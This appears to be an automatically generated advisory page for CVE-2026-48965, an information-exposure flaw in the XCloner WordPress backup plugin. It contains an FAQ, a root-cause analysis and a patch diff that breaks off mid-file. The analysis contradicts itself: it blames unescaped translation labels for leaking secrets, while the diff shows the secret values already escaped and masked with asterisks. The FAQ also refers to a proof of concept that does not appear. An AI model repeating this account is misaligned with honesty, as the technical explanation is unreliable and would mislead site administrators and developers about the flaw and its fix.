What is CVE-2026-48965?

CVE-2026-48965 is a medium-severity vulnerability affecting the XCloner Backup, Restore and Migrate plugin for WordPress, specifically versions up to and including 4.8.6. It allows authenticated attackers with Subscriber-level access or higher to expose sensitive information stored in the WordPress options tables.

How does this vulnerability work?

The vulnerability arises from the use of unsafe output functions in the plugin’s admin panel, which can lead to sensitive data exposure. Attackers can access backend pages that display secrets, such as API keys and user credentials, in plain text due to improper escaping of output.

Who is affected by this vulnerability?

Any WordPress site using the XCloner Backup, Restore and Migrate plugin version 4.8.6 or earlier is affected. Specifically, authenticated users with Subscriber-level access or above can exploit this vulnerability to extract sensitive information.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the XCloner plugin installed on your WordPress site. If it is version 4.8.6 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the XCloner plugin to version 4.8.7 or later, which includes a patch that replaces unsafe output functions with properly escaped alternatives. Regularly updating all plugins is essential for maintaining site security.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure if exploited. Administrators should take this seriously and apply necessary updates.

What kind of sensitive information is exposed?

The vulnerability can expose sensitive configuration data such as AWS keys, Dropbox tokens, Azure API keys, and FTP passwords. This information can be exploited for unauthorized access to external services and data exfiltration.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can log in as a Subscriber and access the XCloner settings page to view sensitive information. It highlights the steps taken to exploit the vulnerability and the potential impact on site security.

What are the implications of data exposure?

If sensitive information is exposed, it can lead to unauthorized access to cloud storage accounts, data manipulation, or further attacks on the affected site. This can compromise the integrity and confidentiality of the site’s data.

How can I protect my site from similar vulnerabilities in the future?

To protect your site, regularly update all plugins and themes, conduct security audits, and implement security measures such as firewalls and monitoring tools. Additionally, limit user permissions and use strong authentication methods.

Is there a way to report this vulnerability?

If you discover any new vulnerabilities or have further information regarding CVE-2026-48965, you can report it to the plugin developers or through official channels such as the WordPress security team to ensure responsible disclosure.

Published : June 21, 2026

CVE-2026-48965: Backup, Restore and Migrate your sites with XCloner <= 4.8.6 Authenticated (Subscriber+) Information Exposure PoC, Patch Analysis & Rule

CVE ID CVE-2026-48965

Plugin xcloner-backup-and-restore

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 4.8.6

Patched Version 4.8.7

Disclosed June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-48965:
This vulnerability exposes sensitive data stored in WordPress options tables within the XCloner plugin. An authenticated attacker with Subscriber-level access or above can extract user details, secret keys, API tokens, and other private configuration data. The issue stems from unsafe output functions used in the plugin’s admin panel partials.

Root Cause:
The plugin uses the `__()` translation function to echo translated strings directly into HTML. Unlike `esc_html__()`, `__()` does not escape output. WordPress stores many secrets as options (e.g., `xcloner_aws_secret`, `xcloner_dropbox_app_secret`, `xcloner_azure_api_key`). An attacker with access to any backend page that displays these values can see them in plain text. The diff shows changes in multiple files, including:
– `xcloner-backup-and-restore/admin/partials/remote_storage/aws.php` (lines 5, 48, 51, 59, 62, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/azure.php` (lines 5, 28, 31, 47, 50, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/backblaze.php` (lines 7, 41, 54, 67, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/dropbox.php` (lines 5, 28, 38, 49, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/ftp.php` (lines 5, 29, 47, 59, etc.)
The functions `__()` are replaced with `esc_html__()` to properly escape output.

Exploitation:
An attacker authenticated as a Subscriber visits the admin page `/wp-admin/admin.php?page=xcloner_backup_and_restore`. This page loads the remote storage partials. The fields displaying secrets are inside “ elements, but the label or placeholder text is rendered with `__()` and the values are already escaped with `esc_attr()`. However, the attack surface includes stored XSS in translation strings or the ability to trigger unexpected output. The primary risk is exposure through reflection of unescaped translation strings that could contain sensitive data if the translation is exploited. In practice, an attacker with Subscriber access can see the admin menu and navigate to the backup settings page where secrets are shown in input fields.

Patch Analysis:
The patch changes every occurrence of `__()` in the remote storage admin partials to `esc_html__()`. It also adds translator comments and fixes the text domain on some strings. The change ensures all output is contextually escaped for HTML. The vulnerable code relied on the translation function to return plain strings, which could include characters that break the HTML context.

Impact:
An attacker can extract sensitive configuration secrets such as AWS keys, Azure API keys, Dropbox tokens, Backblaze credentials, and FTP passwords. This can lead to data exfiltration from the victim’s cloud storage, further lateral attacks, or manipulation of backups.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/xcloner-backup-and-restore/admin/class-xcloner-admin.php
+++ b/xcloner-backup-and-restore/admin/class-xcloner-admin.php
@@ -127,11 +127,13 @@
             $domain = 'xcloner-backup-and-restore';
             $statusCode = 403;
             if (!isset($_POST['xcloner_remote_storage_nonce'])) {
-                wp_die(__($errorMessage, $domain), $statusCode);
+                wp_die(__('Nonce verification failed', 'xcloner-backup-and-restore'), $statusCode);
+                // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
             }
             $nonce = wp_unslash($_POST['xcloner_remote_storage_nonce']);
             if (!wp_verify_nonce($nonce, 'xcloner_remote_storage_action')) {
-                wp_die(__($errorMessage, $domain), $statusCode);
+                wp_die(__('Nonce verification failed', 'xcloner-backup-and-restore'), $statusCode);
+                // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
             }
         }
         if (isset($_POST['action'])) {
@@ -194,7 +196,7 @@
         // wordpress will add the "settings-updated" $_GET parameter to the url
         if (isset($_GET['settings-updated'])) {
             // add settings saved message with the class of "updated"
-            add_settings_error('wporg_messages', 'wporg_message', __('Settings Saved', 'wporg'), 'updated');
+            add_settings_error('wporg_messages', 'wporg_message', __('Settings Saved', 'xcloner-backup-and-restore'), 'updated');
         }
         // show error/update messages
         settings_errors('wporg_messages');
@@ -221,7 +223,7 @@
                        class="nav-tab col s12 m3 l3 <?php
         echo $active_tab == 'general_options' ? 'nav-tab-active' : '';
         ?>"><?php
-        echo __('General Options', 'xcloner-backup-and-restore');
+        echo esc_html__('General Options', 'xcloner-backup-and-restore');
         ?>
                     </a>
                 </li>
@@ -230,7 +232,7 @@
                        class="nav-tab col s12 m3 l3 <?php
         echo $active_tab == 'system_options' ? 'nav-tab-active' : '';
         ?>"><?php
-        echo __('System Options', 'xcloner-backup-and-restore');
+        echo esc_html__('System Options', 'xcloner-backup-and-restore');
         ?>
                     </a>
                 </li>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/aws.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/aws.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Amazon S3 Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Amazon S3 Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -26,17 +26,20 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your "Key" and "Secret <br />Visit %s to install your own S3 like service.'), "<a href='https://aws.amazon.com/s3/' target='_blank'>https://aws.amazon.com/s3/</a>", "<a href='https://minio.io/' target='_blank'>https://minio.io/</a>") ?>
+                <?php
+                /* translators: %1$s is the Amazon S3 URL link, %2$s is the MinIO URL link */
+                echo sprintf(__('Visit %1$s and get your "Key" and "Secret <br />Visit %2$s to install your own S3 like service.', 'xcloner-backup-and-restore'), "<a href='https://aws.amazon.com/s3/' target='_blank'>https://aws.amazon.com/s3/</a>", "<a href='https://minio.io/' target='_blank'>https://minio.io/</a>"); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped, WordPress.WP.I18n.InterpolatedVariableText
+                ?>
             </p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_key"><?php echo __("S3 Key", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_key"><?php echo esc_html__("S3 Key", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("S3 Key", 'xcloner-backup-and-restore') ?>" id="aws_key" type="text"
+            <input placeholder="<?php echo esc_html__("S3 Key", 'xcloner-backup-and-restore') ?>" id="aws_key" type="text"
                    name="xcloner_aws_key" class="validate" value="<?php echo esc_attr(get_option("xcloner_aws_key")) ?>"
                    autocomplete="off">
         </div>
@@ -44,10 +47,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_secret"><?php echo __("S3 Secret", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_secret"><?php echo esc_html__("S3 Secret", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("S3 Secret", 'xcloner-backup-and-restore') ?>" id="aws_secret" type="text"
+            <input placeholder="<?php echo esc_html__("S3 Secret", 'xcloner-backup-and-restore') ?>" id="aws_secret" type="text"
                    name="xcloner_aws_secret" class="validate"
                    value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_aws_secret")))) ?>"
                    autocomplete="off">
@@ -56,14 +59,14 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_region"><?php echo __("S3 Region", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_region"><?php echo esc_html__("S3 Region", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <select placeholder="<?php echo __("example: us-east-1", 'xcloner-backup-and-restore') ?>" id="aws_region"
+            <select placeholder="<?php echo esc_html__("example: us-east-1", 'xcloner-backup-and-restore') ?>" id="aws_region"
                     type="text" name="xcloner_aws_region" class="validate"
                     value="<?php echo esc_attr(get_option("xcloner_aws_region")) ?>" autocomplete="off">
                 <option readonly value="">
-                    <?php echo __("Please Select AWS S3 Region or Leave Unselected for Custom Endpoint") ?>
+                    <?php echo esc_html__("Please Select AWS S3 Region or Leave Unselected for Custom Endpoint", 'xcloner-backup-and-restore') ?>
                 </option>
                 <?php
                 $aws_regions = $remote_storage->get_aws_regions();
@@ -80,21 +83,21 @@
     <div id="custom_aws_endpoint">
         <div class="row">
             <div class="col s12 m3 label">
-                <label for="aws_endpoint"><?php echo __("S3 EndPoint", 'xcloner-backup-and-restore') ?></label>
+                <label for="aws_endpoint"><?php echo esc_html__("S3 EndPoint", 'xcloner-backup-and-restore') ?></label>
             </div>
             <div class=" col s12 m6">
                 <input
-                        placeholder="<?php echo __("S3 EndPoint, leave blank if you want to use the default Amazon AWS Service", 'xcloner-backup-and-restore') ?>"
+                        placeholder="<?php echo esc_html__("S3 EndPoint, leave blank if you want to use the default Amazon AWS Service", 'xcloner-backup-and-restore') ?>"
                         id="aws_endpoint" type="text" name="xcloner_aws_endpoint" class="validate"
                         value="<?php echo esc_attr(get_option("xcloner_aws_endpoint")) ?>" autocomplete="off">
             </div>
         </div>
         <div class="row">
             <div class="col s12 m3 label">
-                <label for="aws_region"><?php echo __("S3 Custom Region", 'xcloner-backup-and-restore') ?></label>
+                <label for="aws_region"><?php echo esc_html__("S3 Custom Region", 'xcloner-backup-and-restore') ?></label>
             </div>
             <div class=" col s12 m6">
-                <input placeholder="<?php echo __("S3 Custom Region, ex: af-south-1", 'xcloner-backup-and-restore') ?>"
+                <input placeholder="<?php echo esc_html__("S3 Custom Region, ex: af-south-1", 'xcloner-backup-and-restore') ?>"
                        id="aws_region" type="text" name="xcloner_aws_region" class="validate"
                        value="<?php echo esc_attr(get_option("xcloner_aws_region")) ?>" autocomplete="off">
             </div>
@@ -103,10 +106,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_bucket_name"><?php echo __("S3 Bucket Name", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_bucket_name"><?php echo esc_html__("S3 Bucket Name", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("S3 Bucket Name", 'xcloner-backup-and-restore') ?>" id="aws_bucket_name"
+            <input placeholder="<?php echo esc_html__("S3 Bucket Name", 'xcloner-backup-and-restore') ?>" id="aws_bucket_name"
                    type="text" name="xcloner_aws_bucket_name" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_aws_bucket_name")) ?>" autocomplete="off">
         </div>
@@ -114,28 +117,28 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_prefix"><?php echo __("S3 Prefix", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_prefix"><?php echo esc_html__("S3 Prefix", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
             <input
-                    placeholder="<?php echo __("S3 Prefix, use / ending to define a folder", 'xcloner-backup-and-restore') ?>"
+                    placeholder="<?php echo esc_html__("S3 Prefix, use / ending to define a folder", 'xcloner-backup-and-restore') ?>"
                     id="aws_prefix" type="text" name="xcloner_aws_prefix" class="validate"
                     value="<?php echo esc_attr(get_option("xcloner_aws_prefix")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('aws') ?>
+    <?php echo common_cleanup_html('aws') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                    value="aws"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                    value="aws"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="aws"
-                    onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                    onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/azure.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/azure.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Azure Blob Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Azure Blob Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -25,17 +25,17 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your "Api Key".', 'xcloner-backup-and-restore'), '<a href="https://azure.microsoft.com/en-us/services/storage/blobs/" target="_blank">https://azure.microsoft.com/en-us/services/storage/blobs/</a>') ?>
-            </p>
+                <?php /* translators: %1$s is a value */
+                    echo sprintf(__('Visit %1$s and get your "Api Key".', 'xcloner-backup-and-restore'), '<a href="https://azure.microsoft.com/en-us/services/storage/blobs/" target="_blank">https://azure.microsoft.com/en-us/services/storage/blobs/</a>') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>            </p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="azure_account_name"><?php echo __("Azure Account Name", 'xcloner-backup-and-restore') ?></label>
+            <label for="azure_account_name"><?php echo esc_html__("Azure Account Name", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Azure Account Name", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Azure Account Name", 'xcloner-backup-and-restore') ?>"
                 id="azure_account_name" type="text" name="xcloner_azure_account_name" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_azure_account_name")) ?>" autocomplete="off">
         </div>
@@ -44,10 +44,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="azure_api_key"><?php echo __("Azure Api Key", 'xcloner-backup-and-restore') ?></label>
+            <label for="azure_api_key"><?php echo esc_html__("Azure Api Key", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Azure Api Key", 'xcloner-backup-and-restore') ?>" id="azure_api_key"
+            <input placeholder="<?php echo esc_html__("Azure Api Key", 'xcloner-backup-and-restore') ?>" id="azure_api_key"
                 type="text" name="xcloner_azure_api_key" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_azure_api_key")))) ?>" autocomplete="off">
         </div>
@@ -55,28 +55,28 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="azure_container"><?php echo __("Azure Container", 'xcloner-backup-and-restore') ?></label>
+            <label for="azure_container"><?php echo esc_html__("Azure Container", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Azure Container", 'xcloner-backup-and-restore') ?>" id="azure_container"
+            <input placeholder="<?php echo esc_html__("Azure Container", 'xcloner-backup-and-restore') ?>" id="azure_container"
                 type="text" name="xcloner_azure_container" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_azure_container")) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('azure')?>
+    <?php echo common_cleanup_html('azure') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="azure"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="azure"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="azure"
                 onclick="jQuery('#connection_check').val('1')">
-                <?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                <?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/backblaze.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/backblaze.php
@@ -6,7 +6,7 @@
 ?>
 <div class="collapsible-header">
     <i class="material-icons">computer</i>
-    <?php echo __("Backblaze B2 Storage", 'xcloner-backup-and-restore') ?>
+    <?php echo esc_html__("Backblaze B2 Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -26,8 +26,8 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your KeyID and  applicationKey.', 'xcloner-backup-and-restore'), '<a href="https://secure.backblaze.com/b2_buckets.htm" target="_blank">https://secure.backblaze.com/b2_buckets.htm</a>') ?>
-            </p>
+                <?php /* translators: %1$s is a value */
+                    echo sprintf(__('Visit %1$s and get your KeyID and  applicationKey.', 'xcloner-backup-and-restore'), '<a href="https://secure.backblaze.com/b2_buckets.htm" target="_blank">https://secure.backblaze.com/b2_buckets.htm</a>') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>            </p>
             <p>
                 If you specify <strong>only the bucket name</strong>, you must use the <strong>master key</strong>.<br>
                 However, if you specify <strong>both bucket name and bucket id</strong>, you do not need the master key and can use a <strong>single-bucket key</strong>.
@@ -38,10 +38,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="backblaze_account_id"><?php echo __("Backblaze KeyID", 'xcloner-backup-and-restore') ?></label>
+                for="backblaze_account_id"><?php echo esc_html__("Backblaze KeyID", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze KeyID", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze KeyID", 'xcloner-backup-and-restore') ?>"
                 id="backblaze_account_id" type="text" name="xcloner_backblaze_account_id" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_backblaze_account_id")) ?>" autocomplete="off">
         </div>
@@ -51,10 +51,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="backblaze_application_key"><?php echo __("Backblaze applicationKey", 'xcloner-backup-and-restore') ?></label>
+                for="backblaze_application_key"><?php echo esc_html__("Backblaze applicationKey", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze applicationKey", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze applicationKey", 'xcloner-backup-and-restore') ?>"
                 id="backblaze_application_key" type="text" name="xcloner_backblaze_application_key" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_backblaze_application_key")))) ?>"
                 autocomplete="off">
@@ -64,10 +64,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="backblaze_bucket_name"><?php echo __("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?></label>
+                for="backblaze_bucket_name"><?php echo esc_html__("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?>"
                 id="backblaze_bucket_name" type="text" name="xcloner_backblaze_bucket_name" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_backblaze_bucket_name")) ?>" autocomplete="off">
         </div>
@@ -76,28 +76,28 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                    for="backblaze_bucket_id"><?php echo __("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?></label>
+                    for="backblaze_bucket_id"><?php echo esc_html__("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?>"
                    id="backblaze_bucket_id" type="text" name="xcloner_backblaze_bucket_id" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_backblaze_bucket_id")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('backblaze')?>
+    <?php echo common_cleanup_html('backblaze') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="backblaze"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="backblaze"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action"
                 value="backblaze"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/dropbox.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/dropbox.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Dropbox Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Dropbox Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -25,7 +25,8 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your "App secret".'), "<a href='https://www.dropbox.com/developers/apps' target='_blank'>https://www.dropbox.com/developers/apps</a>") ?>
+                <?php /* translators: %1$s is a value */
+                echo sprintf(__('Visit %1$s and get your "App secret".', 'xcloner-backup-and-restore'), "<a href='https://www.dropbox.com/developers/apps' target='_blank'>https://www.dropbox.com/developers/apps</a>") // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
             </p>
         </div>
     </div>
@@ -33,10 +34,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="dropbox_access_token"><?php echo __("Dropbox Access Token", 'xcloner-backup-and-restore') ?></label>
+                for="dropbox_access_token"><?php echo esc_html__("Dropbox Access Token", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Dropbox Access Token", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Dropbox Access Token", 'xcloner-backup-and-restore') ?>"
                 id="dropbox_access_token" type="text" name="xcloner_dropbox_access_token" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_dropbox_access_token")) ?>" autocomplete="off">
         </div>
@@ -45,10 +46,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="dropbox_app_secret"><?php echo __("Dropbox App Secret", 'xcloner-backup-and-restore') ?></label>
+            <label for="dropbox_app_secret"><?php echo esc_html__("Dropbox App Secret", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Dropbox App Secret", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Dropbox App Secret", 'xcloner-backup-and-restore') ?>"
                 id="dropbox_app_secret" type="text" name="xcloner_dropbox_app_secret" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_dropbox_app_secret")))) ?>"
                 autocomplete="off">
@@ -57,27 +58,27 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="dropbox_prefix"><?php echo __("Dropbox Prefix", 'xcloner-backup-and-restore') ?></label>
+            <label for="dropbox_prefix"><?php echo esc_html__("Dropbox Prefix", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Dropbox Prefix", 'xcloner-backup-and-restore') ?>" id="dropbox_prefix"
+            <input placeholder="<?php echo esc_html__("Dropbox Prefix", 'xcloner-backup-and-restore') ?>" id="dropbox_prefix"
                 type="text" name="xcloner_dropbox_prefix" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_dropbox_prefix")) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('dropbox')?>
+    <?php echo common_cleanup_html('dropbox') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="dropbox"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="dropbox"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="dropbox"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/ftp.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/ftp.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("FTP Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("FTP Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -26,17 +26,17 @@
 <div class="collapsible-body">
     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_host"><?php echo __("Ftp Hostname", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_host"><?php echo esc_html__("Ftp Hostname", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class="col s12 m6">
             <input
                     id="ftp_host"
-                    placeholder="<?php echo __("Ftp Hostname", 'xcloner-backup-and-restore') ?>"
+                    placeholder="<?php echo esc_html__("Ftp Hostname", 'xcloner-backup-and-restore') ?>"
                     type="text" name="xcloner_ftp_hostname" class="validate"
                     value="<?php echo esc_attr(get_option("xcloner_ftp_hostname")) ?>">
         </div>
         <div class=" col s12 m2">
-            <input placeholder="<?php echo __("Ftp Port", 'xcloner-backup-and-restore') ?>" id="ftp_port" type="text"
+            <input placeholder="<?php echo esc_html__("Ftp Port", 'xcloner-backup-and-restore') ?>" id="ftp_port" type="text"
                    name="xcloner_ftp_port" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_ftp_port", 21)) ?>">
         </div>
@@ -44,10 +44,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_username"><?php echo __("Ftp Username", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_username"><?php echo esc_html__("Ftp Username", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Ftp Username", 'xcloner-backup-and-restore') ?>" id="ftp_username"
+            <input placeholder="<?php echo esc_html__("Ftp Username", 'xcloner-backup-and-restore') ?>" id="ftp_username"
                    type="text" name="xcloner_ftp_username" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_ftp_username")) ?>" autocomplete="off">
         </div>
@@ -56,10 +56,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_password"><?php echo __("Ftp Password", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_password"><?php echo esc_html__("Ftp Password", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Ftp Password", 'xcloner-backup-and-restore') ?>" id="ftp_password"
+            <input placeholder="<?php echo esc_html__("Ftp Password", 'xcloner-backup-and-restore') ?>" id="ftp_password"
